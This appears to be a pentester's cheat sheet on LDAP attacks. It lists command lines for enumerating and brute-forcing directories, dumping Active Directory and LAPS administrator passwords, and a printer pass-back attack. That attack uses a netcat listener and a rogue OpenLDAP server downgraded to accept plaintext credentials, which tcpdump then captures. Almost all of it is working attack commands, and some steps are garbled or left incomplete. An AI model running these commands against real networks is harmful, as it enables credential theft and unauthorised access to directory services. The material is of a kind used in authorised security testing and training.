# LDAP (Lightweight Directory Access Protocol) Pentesting LDAP is a standard protocol designed to maintain and access "directory services" within a network. Default ports are 389 (LDAP), 636 (LDAPS), 3268 (LDAP connection to Global Catalog), 3269 (LDAP connection to Global Catalog over SSL). ### Enumeration ``` # Nmap nmap --script ldap-brute --script-args ldap.base='"cn=users,dc=cqure,dc=net"' -p 389 nmap --script ldap-search -p 389 nmap --script ldap-* -p 389 nmap --script "ldap* and not brute" -p 389 # NetExec # -k: Use Kerberos authentication netexec ldap -u usernames.txt -k # --trusted-for-delegation: Enumerate computers and users with the flag `TRUSTED_FOR_DELEGATION` # reference: https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties#property-flag-descriptions netexec ldap -u username -p password --trusted-for-delegation # Users ldapsearch -x -H ldap://10.0.0.1 -D "username@example.local" -w "password" -b "dc=example,dc=local" "(objectclass=user)" sAMAccountName memberOf # Groups ldapsearch -x -H ldap://10.0.0.1 -D "username@example.local" -w "password" -b "dc=example,dc=local" "(objectClass=group)" name member ``` ### Dump Active Directory Information If you have the credential, you can get the Active Directory information via LDAP. ``` # --no-html: Disable html output # --no-grep: Disable greppable output # -o: Output dir ldapdomaindump -u 'DOMAIN\username' -p password --no-html --no-grep -o dumped ``` ### Connect #### AD CS (Active Directory Certificate Services) ``` netexec ldap -d 'domain' -u 'username' -p 'password' -M adcs ``` #### LAPS (Local Administrator Password Solution) ``` netexec ldap -d 'domain' -u 'username' -p 'password' --kdcHost -M laps ``` ### Pass-Back Attack Attack against the network devices such as printers.\ For example, access Open a listener for connecting back to your local machine. ``` nc -vp 1389 ``` In your browser, test LDAP settings where you input username and password. #### Host Rogue LDAP Server If we cannot connect back in local machine by netcat, we need to create a rogue LDAP server.\ Install the dependencies at first. ``` sudo apt update sudo apt install -y slapd ldap-utils sudo systemctl enable slapd ``` Configure your own rogue LDAP server by executing the following command. ``` sudo dpkg-reconfigure -p low slapd # --------------------------------------------------- # in configuration dialog 1. Omit OpenLDAP server configuration: No 2. DNS domain name: 3. Organization name: 4. Administrator password: 5. Database backend to use: MDB 6. Do you want the database to be removed when slapd is purged?: No 7. Move old database?: Yes ``` We need to make your rogue LDAP server to be vulnerable by downgrading the supported authentication mechanism.\ Create the config file named "config.ldif". ``` dn: cn=config replace: olcSaslSecProps olcSaslSecProps: noanonymous,minssf=0,passcred ``` Now we can use the config file to patch the LDAP server. ``` # -Y: SASL mechanism # -H: URI sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./config.ldif sudo service slapd restart ``` We can verify that the rogue LDAP server’s configuration has been applied: ``` ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms ``` For capturing the credentials, run the following command. ``` sudo tcpdump -SX -i tcp port 389 ``` In browser, test the printer settings and capture the credentials via tcpdump.